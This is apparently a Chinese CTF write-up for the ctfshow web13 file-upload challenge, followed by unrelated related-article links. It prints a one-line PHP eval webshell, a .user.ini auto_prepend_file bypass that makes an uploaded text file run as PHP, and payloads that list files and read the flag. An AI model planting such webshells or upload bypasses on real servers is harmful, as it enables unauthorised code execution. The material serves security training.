当前位置: 首页 > news >正文

CTFshow-Web-文件上传

一、靶场:ctfshow web13
二、解题步骤
步骤一:打开靶场,发现有文件上传的按钮,猜测是文件上传的洞,打开源码也没有其他提示

image1

image2

步骤二:先尝试上传一些文件

1、图片文件,但报错了,似乎太大了

image3

2、再尝试上传一个空的php,显示后缀错误

image4

3、尝试上传一个空文本,上传成功

image5

4、那就尝试写一个最短的一句话木马:<?php eval($_GET[a]); 作为文本尝试上传,成功

image6

步骤三:由前面的尝试可以得知图片马应该是不行了,大小限制了,那么这里尝试上传 .user.ini 和 .htaccess 文件去解析前面上传的木马文本,但由于大小问题 .htaccess 文件无法上传,那么这里尝试 .user.ini 看 ini 文件能否上传

内容:auto_prepend_file=1.txt

image7

成功

步骤四:连接,使用payload:?a=print_r(glob("*")); 查看当前文件夹的文件

image8

步骤五:flag应该在那个文件名很长的文件中,使用payload:?a=highlight_file(""); 查看文件内容,得到flag

image9

注意事项:使用.user.ini的前提是含有.user.ini的文件夹下需要有正常的php文件,否则也不能包含了

http://www.jsqmd.com/news/59108/

相关文章:

  • pbootcms模板做百度推广竞价后打不开
  • CTFshow-Web-源码泄露与MD5绕过
  • 团队项目冲刺--Day3
  • 二零二五年十二月过氧苯甲酰品牌推荐排行榜单:五大品牌综合对比与选购指南
  • 2025年权威分析推荐:河北城普制冷设备有限责任公司的核心竞争力解析
  • MemLabs取证-Pass-03题解
  • 二零二五年十二月鲜花代运营服务商综合评测与排行:五家服务商深度对比与选择指南
  • 2025年深圳股权分割律师权威推荐榜单:子女抚养权律师/继承律师/离婚房产律师团队专业解析
  • 2025年12月鲜花代运营服务商推荐排行榜:五大服务商对比与选择指南
  • 二零二五年十二月压缩机储液器厂家推荐排行榜:五家实力企业深度对比与选购指南
  • 完整教程:概念辨析|工业数字化、工业4.0、智能制造、数字化制造:异同解读与实践路径
  • 【IEEE出版 | EI检索】第六届机械自动化与智能制造国际学术会议(MAIM 2025)
  • 二零二五年十二月压缩机储液器厂家推荐排行榜:五家优质企业深度对比与选购指南
  • 2025年12月电动喷雾器厂家综合对比与推荐排行榜单分析
  • 延庆区农村自建房找谁好?北京市延庆区自建房公司 / 机构深度评测口碑推荐榜
  • 2025年12月电动喷雾器厂家推荐排行:五家优质企业综合对比与选购指南
  • 二零二五年十二月压缩机储液器厂家推荐榜:五家优质企业综合对比与选购指南
  • 2025深圳继承律师权威推荐榜单:离婚房产律师/股权分割律师/婚姻律师及机构精选
  • XSS Labs-Level1题解
  • 杭州办婚礼哪里好榜单:2025杭州一站式婚礼排名出炉
  • XSS Labs-Level2题解
  • XSS Labs-Level3题解
  • Vulnhub-GoldenEye靶场渗透
  • QT智能指针总结
  • 2025重金属水质监测设备厂家有哪些指南:厂家技术亮点解析
  • 想在房山区老家农村盖房子,靠谱的自建房公司口碑推荐。北京市房山区自建房公司 / 机构权威测评推荐排行榜
  • linux 匹配文件内容
  • 如何使用PbootCMS内容详情页标签调用相关信息
  • 2025杭州草坪婚礼场地推荐:杭州结婚场地榜单大盘点
  • 2025苏州会议餐配送优选!专业苏州餐饮公司全程保航